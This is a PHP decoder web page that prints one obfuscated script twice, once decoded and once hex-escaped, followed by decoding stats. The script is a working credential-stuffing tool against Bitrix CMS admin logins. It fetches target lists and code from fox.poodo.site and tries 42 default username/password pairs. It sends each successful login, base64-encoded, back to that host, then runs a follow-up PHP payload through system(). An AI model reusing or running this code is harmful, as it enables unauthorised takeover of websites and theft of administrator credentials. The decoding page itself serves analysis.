Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto d2gEG; x_74y: file_put_contents("\147\x65\164\x5f\143\x6d\163\61\56\164\170\x..

Decoded Output download

<?php 
 goto d2gEG; x_74y: file_put_contents("get_cms1.txt", http_get_contents("http://fox.poodo.site/get_cms1.php")); goto CCZNS; LH7Er: require_once "roll.txt"; goto H_2Kz; SYqEx: file_put_contents("angry.txt", http_get_contents("http://fox.poodo.site/st/angry.txt")); goto LH7Er; T2tFi: while (!feof($f)) { $url = trim(fgets($f)); $parse = parse_url($url); $users = array(1 => array("login" => "admin", "password" => "123456"), 2 => array("login" => "admin", "password" => "Bitrix*123456"), 3 => array("login" => "admin", "password" => "adminadmin"), 4 => array("login" => "admin", "password" => "admin123"), 5 => array("login" => "bitrix", "password" => "bitrix"), 6 => array("login" => "admin", "password" => "111111"), 7 => array("login" => "admin", "password" => "123123"), 8 => array("login" => "admin1", "password" => "123456"), 9 => array("login" => "admin", "password" => "1234567890"), 10 => array("login" => "admin2", "password" => "123456"), 11 => array("login" => "admin2", "password" => "admin2"), 12 => array("login" => "admin", "password" => "123456789"), 13 => array("login" => "bitrix", "password" => "123456"), 14 => array("login" => "admin", "password" => "qwerty"), 15 => array("login" => "support", "password" => "123456"), 16 => array("login" => "admin1", "password" => "admin1"), 17 => array("login" => "bitrix", "password" => "bitrix123"), 18 => array("login" => "admin", "password" => "qwerty123"), 19 => array("login" => "admin", "password" => "password"), 20 => array("login" => "administrator", "password" => "administrator"), 21 => array("login" => "admin", "password" => "1q2w3e4r"), 22 => array("login" => "admin", "password" => "123321"), 23 => array("login" => "administrator", "password" => "123456"), 24 => array("login" => "admin", "password" => "12345678"), 25 => array("login" => "admin", "password" => "123qwe"), 26 => array("login" => "admin", "password" => "159753"), 27 => array("login" => "admin", "password" => "1qaz2wsx"), 28 => array("login" => "demo", "password" => "demo123"), 29 => array("login" => "test", "password" => "123456"), 30 => array("login" => "test", "password" => "test123"), 31 => array("login" => "content", "password" => "content"), 32 => array("login" => "manager", "password" => "manager"), 33 => array("login" => "tester", "password" => "tester"), 34 => array("login" => "tester", "password" => "123456"), 35 => array("login" => "manager", "password" => "123456"), 36 => array("login" => "content", "password" => "123456"), 37 => array("login" => "master", "password" => "master"), 38 => array("login" => "support", "password" => "support"), 39 => array("login" => "editor", "password" => "editor"), 40 => array("login" => "manager", "password" => "manager123"), 41 => array("login" => "content", "password" => "content123"), 42 => array("login" => "editor", "password" => "123456")); $i = 1; while ($i < 42) { $post_par = "backurl=%2F&AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=" . $users[$i]["login"] . "&USER_PASSWORD=" . $users[$i]["password"] . "&Login=%D0%92%D0%BE%D0%B9%D1%82%D0%B8"; $AC->post($url, $post_par); $i++; } } goto k0Nk_; CCZNS: function callback_function($response, $info, $request) { if (strpos($response, ".AUTHAGENT.setAuthResult") !== false) { parse_str($request->post_data, $output); $login = $output["USER_LOGIN"]; $password = $output["USER_PASSWORD"]; echo PHP_EOL . " ===================== ok: =====================  " . $info["url"] . " - " . $login . ":" . $password . '' . PHP_EOL; http_get_contents("http://fox.poodo.site/cms1.php?we=" . base64_encode($info["url"]) . "&fe=" . base64_encode("inc.class.cms.1.php") . "&cm=" . base64_encode("1") . "&sl=" . base64_encode($login) . "&sp=" . base64_encode($password)); goto end; } end: return; } goto TCBj_; fTTeN: $f = fopen("get_cms1.txt", "r"); goto T2tFi; ZMsgd: file_put_contents(basename(__FILE__), http_get_contents("http://fox.poodo.site/st/get_cms1.txt")); goto SaeQF; R2j2O: unlink("get_cms1.txt"); goto ZEHAE; k0Nk_: $AC->execute(30); goto R2j2O; ZEHAE: system("php inc.class.cms.1.php"); goto OWTr1; s1tWE: date_default_timezone_set("Europe/Kiev"); goto f4DpC; H_2Kz: require_once "angry.txt"; goto x_74y; SaeQF: file_put_contents("list.txt", http_get_contents("http://fox.poodo.site/st/list.txt")); goto WHACM; iVLcE: $AC->load_useragent_list("list.txt"); goto fTTeN; f4DpC: function http_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $urlPage = curl_exec($ch); curl_close($ch); return $urlPage; } goto ZMsgd; TCBj_: $AC = new AngryCurl("callback_function"); goto iVLcE; WHACM: file_put_contents("roll.txt", http_get_contents("http://fox.poodo.site/st/rollheader.txt")); goto SYqEx; r2aHF: ini_set("memory_limit", "512M"); goto s1tWE; d2gEG: ini_set("max_execution_time", 0); goto r2aHF; OWTr1: ?> 

Did this file decode correctly?

Original Code

<?php
 goto d2gEG; x_74y: file_put_contents("\147\x65\164\x5f\143\x6d\163\61\56\164\170\x74", http_get_contents("\x68\x74\164\x70\x3a\57\x2f\x66\157\170\x2e\x70\x6f\x6f\x64\x6f\x2e\163\151\164\x65\57\147\145\x74\x5f\143\155\x73\61\x2e\x70\x68\160")); goto CCZNS; LH7Er: require_once "\x72\157\154\154\x2e\x74\170\x74"; goto H_2Kz; SYqEx: file_put_contents("\x61\x6e\x67\162\x79\x2e\164\x78\x74", http_get_contents("\150\164\164\160\72\57\57\146\x6f\170\56\160\x6f\x6f\x64\x6f\x2e\163\151\x74\145\57\163\x74\57\141\156\147\x72\171\x2e\164\x78\164")); goto LH7Er; T2tFi: while (!feof($f)) { $url = trim(fgets($f)); $parse = parse_url($url); $users = array(1 => array("\x6c\157\147\151\x6e" => "\x61\x64\x6d\151\x6e", "\x70\x61\x73\163\x77\x6f\162\x64" => "\x31\x32\63\x34\x35\x36"), 2 => array("\154\157\147\151\156" => "\141\144\x6d\x69\156", "\160\141\x73\x73\x77\157\162\x64" => "\x42\x69\164\162\151\170\52\x31\62\x33\64\x35\66"), 3 => array("\x6c\157\x67\x69\156" => "\141\x64\155\151\x6e", "\160\141\163\163\x77\157\162\144" => "\141\144\x6d\x69\x6e\x61\x64\x6d\x69\x6e"), 4 => array("\154\157\x67\151\156" => "\141\x64\x6d\151\156", "\x70\x61\163\x73\167\157\x72\x64" => "\x61\x64\x6d\151\156\x31\x32\x33"), 5 => array("\x6c\157\147\x69\x6e" => "\x62\151\164\x72\x69\x78", "\160\x61\163\163\167\x6f\162\144" => "\142\x69\164\x72\151\x78"), 6 => array("\154\157\x67\151\x6e" => "\141\x64\155\151\156", "\x70\141\163\x73\167\157\162\144" => "\61\61\x31\x31\61\61"), 7 => array("\154\x6f\x67\151\156" => "\x61\x64\155\x69\156", "\x70\x61\163\x73\167\x6f\162\x64" => "\61\62\x33\61\x32\x33"), 8 => array("\154\x6f\147\x69\x6e" => "\x61\x64\155\151\x6e\x31", "\x70\141\163\163\167\157\162\144" => "\61\62\63\64\x35\x36"), 9 => array("\154\x6f\x67\x69\x6e" => "\x61\144\155\x69\156", "\x70\141\x73\x73\167\157\162\144" => "\61\62\63\64\x35\66\67\x38\x39\60"), 10 => array("\154\x6f\x67\151\x6e" => "\x61\144\x6d\x69\x6e\62", "\160\141\x73\163\167\x6f\x72\x64" => "\61\62\x33\64\65\66"), 11 => array("\154\x6f\147\x69\x6e" => "\x61\144\155\151\156\x32", "\x70\141\x73\163\x77\x6f\x72\144" => "\x61\x64\x6d\151\x6e\62"), 12 => array("\154\x6f\147\151\x6e" => "\141\x64\155\x69\x6e", "\x70\x61\163\163\167\157\162\144" => "\x31\62\63\64\x35\x36\67\x38\71"), 13 => array("\x6c\157\147\151\156" => "\142\151\164\x72\151\170", "\x70\x61\x73\x73\x77\x6f\162\x64" => "\61\x32\63\x34\x35\66"), 14 => array("\x6c\157\147\x69\x6e" => "\x61\144\155\151\156", "\160\x61\x73\x73\167\157\162\144" => "\161\x77\145\162\x74\171"), 15 => array("\154\157\x67\151\x6e" => "\x73\x75\x70\x70\x6f\x72\x74", "\160\x61\163\x73\x77\157\162\144" => "\x31\62\x33\x34\x35\x36"), 16 => array("\154\157\x67\x69\x6e" => "\x61\144\x6d\x69\156\x31", "\x70\x61\163\x73\x77\x6f\x72\144" => "\141\144\155\x69\x6e\x31"), 17 => array("\x6c\x6f\x67\x69\156" => "\142\151\x74\162\151\170", "\160\x61\x73\x73\x77\x6f\x72\144" => "\142\151\164\x72\x69\170\61\x32\x33"), 18 => array("\x6c\x6f\x67\x69\x6e" => "\141\144\x6d\x69\156", "\x70\141\x73\163\167\x6f\162\144" => "\x71\167\x65\x72\x74\x79\x31\62\63"), 19 => array("\x6c\x6f\147\151\x6e" => "\141\x64\155\151\156", "\160\141\x73\x73\x77\x6f\x72\x64" => "\x70\141\x73\163\x77\x6f\x72\144"), 20 => array("\154\x6f\147\151\156" => "\141\144\155\151\156\x69\x73\x74\162\x61\x74\157\x72", "\x70\141\163\x73\167\x6f\x72\144" => "\141\x64\155\151\x6e\x69\x73\164\x72\x61\164\157\x72"), 21 => array("\154\x6f\147\x69\x6e" => "\x61\x64\x6d\x69\156", "\160\141\x73\163\x77\x6f\162\144" => "\61\x71\62\167\63\x65\x34\162"), 22 => array("\x6c\x6f\x67\x69\x6e" => "\141\144\155\151\156", "\x70\x61\x73\163\x77\157\162\x64" => "\x31\x32\63\63\x32\x31"), 23 => array("\154\157\x67\151\156" => "\141\x64\x6d\151\x6e\151\x73\164\x72\141\164\x6f\x72", "\x70\x61\163\x73\x77\x6f\162\144" => "\x31\x32\x33\x34\x35\x36"), 24 => array("\x6c\x6f\147\151\x6e" => "\x61\144\155\x69\156", "\x70\x61\163\163\167\157\x72\x64" => "\61\62\63\64\65\x36\67\x38"), 25 => array("\154\x6f\x67\x69\x6e" => "\x61\144\155\151\x6e", "\160\141\163\x73\x77\157\x72\144" => "\61\62\x33\x71\x77\x65"), 26 => array("\154\x6f\x67\151\x6e" => "\x61\x64\x6d\x69\156", "\160\141\163\163\167\x6f\x72\144" => "\61\x35\x39\x37\65\x33"), 27 => array("\x6c\x6f\147\x69\x6e" => "\141\144\155\x69\156", "\160\141\x73\163\167\157\162\x64" => "\x31\161\x61\172\62\x77\x73\170"), 28 => array("\154\157\147\x69\156" => "\x64\145\x6d\157", "\160\141\163\163\167\157\162\x64" => "\144\145\155\x6f\61\62\x33"), 29 => array("\154\157\x67\151\156" => "\x74\x65\x73\x74", "\x70\141\163\x73\167\x6f\x72\x64" => "\61\x32\63\x34\65\x36"), 30 => array("\x6c\157\147\151\x6e" => "\x74\145\x73\164", "\x70\141\x73\x73\167\x6f\162\144" => "\164\145\163\164\61\62\x33"), 31 => array("\x6c\x6f\147\x69\x6e" => "\x63\x6f\156\x74\x65\156\164", "\160\141\x73\x73\167\157\162\144" => "\x63\x6f\x6e\164\145\x6e\x74"), 32 => array("\x6c\157\x67\151\x6e" => "\x6d\x61\156\x61\147\x65\x72", "\x70\x61\163\x73\167\157\162\144" => "\x6d\x61\156\141\147\x65\x72"), 33 => array("\x6c\x6f\x67\151\x6e" => "\x74\x65\163\x74\x65\162", "\160\141\163\163\167\157\x72\x64" => "\x74\145\x73\164\x65\162"), 34 => array("\x6c\157\x67\151\x6e" => "\x74\x65\163\x74\145\x72", "\160\141\163\163\167\157\162\x64" => "\61\62\63\x34\x35\66"), 35 => array("\x6c\x6f\x67\151\156" => "\x6d\x61\x6e\141\x67\x65\162", "\x70\141\x73\163\167\x6f\x72\144" => "\61\x32\x33\64\x35\66"), 36 => array("\154\x6f\x67\x69\x6e" => "\x63\157\156\164\x65\156\x74", "\160\x61\x73\x73\167\x6f\x72\x64" => "\61\62\x33\x34\65\66"), 37 => array("\x6c\157\147\x69\156" => "\x6d\141\x73\x74\145\162", "\160\141\163\x73\x77\157\162\x64" => "\x6d\x61\163\164\x65\x72"), 38 => array("\154\x6f\x67\151\156" => "\x73\165\160\x70\157\162\x74", "\x70\141\x73\x73\x77\157\162\144" => "\x73\165\160\x70\x6f\x72\x74"), 39 => array("\x6c\157\147\x69\x6e" => "\x65\144\x69\x74\157\162", "\x70\141\x73\163\167\157\162\144" => "\x65\144\151\164\157\x72"), 40 => array("\x6c\x6f\147\151\x6e" => "\155\141\x6e\141\x67\145\162", "\160\x61\x73\x73\167\157\x72\x64" => "\155\x61\x6e\141\147\x65\162\x31\x32\63"), 41 => array("\x6c\x6f\x67\x69\x6e" => "\x63\157\x6e\164\x65\x6e\164", "\160\x61\163\163\167\x6f\x72\144" => "\143\x6f\x6e\x74\145\156\164\61\62\63"), 42 => array("\154\157\x67\x69\x6e" => "\x65\x64\151\x74\x6f\162", "\160\x61\x73\163\167\x6f\x72\144" => "\x31\x32\x33\64\65\x36")); $i = 1; while ($i < 42) { $post_par = "\x62\141\143\x6b\165\162\x6c\75\45\x32\106\46\x41\x55\124\x48\x5f\106\x4f\x52\115\75\131\46\x54\x59\x50\x45\75\101\x55\x54\110\x26\125\x53\x45\x52\137\114\117\107\111\x4e\x3d" . $users[$i]["\x6c\157\147\151\156"] . "\46\125\x53\105\122\137\120\x41\x53\x53\127\117\x52\x44\75" . $users[$i]["\x70\x61\163\x73\167\x6f\162\x64"] . "\46\x4c\x6f\x67\x69\156\x3d\x25\104\x30\45\71\62\45\x44\x30\45\x42\x45\45\104\x30\45\102\71\45\x44\61\x25\x38\62\x25\104\x30\45\x42\70"; $AC->post($url, $post_par); $i++; } } goto k0Nk_; CCZNS: function callback_function($response, $info, $request) { if (strpos($response, "\x2e\x41\125\x54\x48\101\x47\x45\116\124\x2e\x73\145\164\x41\x75\164\150\x52\x65\163\x75\x6c\x74") !== false) { parse_str($request->post_data, $output); $login = $output["\125\x53\105\122\137\114\117\x47\x49\x4e"]; $password = $output["\125\x53\105\x52\137\120\101\x53\123\x57\x4f\122\x44"]; echo PHP_EOL . "\x20\x3d\75\x3d\x3d\x3d\75\75\75\75\75\x3d\75\75\x3d\x3d\75\75\x3d\x3d\75\75\x20\157\153\x3a\40\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\x3d\75\x3d\x3d\75\75\x3d\75\75\x3d\75\75\x20\40" . $info["\x75\x72\154"] . "\x20\55\40" . $login . "\72" . $password . '' . PHP_EOL; http_get_contents("\150\164\x74\x70\72\57\57\x66\157\170\x2e\x70\x6f\157\x64\x6f\x2e\163\151\164\x65\57\143\155\163\61\x2e\x70\x68\160\x3f\x77\145\75" . base64_encode($info["\165\x72\x6c"]) . "\x26\146\x65\75" . base64_encode("\x69\x6e\143\x2e\x63\154\141\163\x73\x2e\143\155\163\x2e\x31\56\160\x68\160") . "\46\143\x6d\x3d" . base64_encode("\x31") . "\x26\x73\x6c\75" . base64_encode($login) . "\x26\x73\x70\x3d" . base64_encode($password)); goto end; } end: return; } goto TCBj_; fTTeN: $f = fopen("\147\x65\x74\137\143\x6d\163\61\56\x74\170\x74", "\x72"); goto T2tFi; ZMsgd: file_put_contents(basename(__FILE__), http_get_contents("\x68\164\x74\160\72\x2f\x2f\x66\157\170\56\x70\x6f\x6f\144\x6f\56\163\151\164\x65\57\x73\164\57\147\145\164\137\143\x6d\163\61\56\164\x78\x74")); goto SaeQF; R2j2O: unlink("\x67\145\x74\x5f\143\155\163\x31\56\x74\170\x74"); goto ZEHAE; k0Nk_: $AC->execute(30); goto R2j2O; ZEHAE: system("\x70\x68\160\x20\x69\x6e\x63\x2e\x63\154\x61\163\x73\x2e\143\x6d\x73\x2e\61\x2e\x70\150\x70"); goto OWTr1; s1tWE: date_default_timezone_set("\x45\165\162\x6f\x70\x65\57\113\151\x65\x76"); goto f4DpC; H_2Kz: require_once "\141\156\x67\162\x79\x2e\x74\170\x74"; goto x_74y; SaeQF: file_put_contents("\154\x69\163\164\56\164\x78\x74", http_get_contents("\150\x74\164\x70\x3a\x2f\x2f\146\x6f\170\56\x70\157\157\x64\x6f\56\x73\x69\x74\145\57\x73\x74\x2f\154\x69\163\164\56\x74\x78\164")); goto WHACM; iVLcE: $AC->load_useragent_list("\154\x69\163\x74\x2e\164\170\164"); goto fTTeN; f4DpC: function http_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $urlPage = curl_exec($ch); curl_close($ch); return $urlPage; } goto ZMsgd; TCBj_: $AC = new AngryCurl("\143\x61\154\x6c\142\141\x63\153\137\x66\x75\x6e\143\164\151\x6f\156"); goto iVLcE; WHACM: file_put_contents("\x72\157\x6c\x6c\x2e\x74\x78\164", http_get_contents("\150\164\x74\160\72\x2f\x2f\146\x6f\x78\x2e\160\157\x6f\144\x6f\x2e\163\151\x74\x65\57\x73\164\x2f\162\157\154\x6c\150\145\141\144\x65\x72\x2e\x74\x78\x74")); goto SYqEx; r2aHF: ini_set("\155\x65\155\x6f\162\x79\x5f\154\151\x6d\151\x74", "\65\61\62\x4d"); goto s1tWE; d2gEG: ini_set("\155\x61\170\137\145\x78\145\143\x75\164\x69\157\x6e\x5f\x74\151\155\x65", 0); goto r2aHF; OWTr1: ?>

Function Calls

None

Variables

None

Stats

MD5 4ca2bccd8ae40a48ca25929ed1468b34
Eval Count 0
Decode Time 67 ms